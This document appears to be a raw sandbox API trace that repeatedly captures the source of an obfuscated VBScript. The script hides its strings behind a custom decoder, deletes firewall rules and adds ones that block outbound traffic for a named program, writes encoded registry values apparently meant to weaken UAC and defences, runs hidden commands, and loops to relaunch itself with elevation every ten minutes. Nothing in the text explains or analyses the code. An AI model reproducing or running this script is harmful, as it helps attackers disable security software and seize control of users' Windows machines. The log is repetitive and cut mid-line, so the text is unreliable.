bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0222.940] wcsncmp (_String1="id(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.940] wcsncmp (_String1="d(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.940] wcsncmp (_String1="(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.940] wcsncmp (_String1="s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 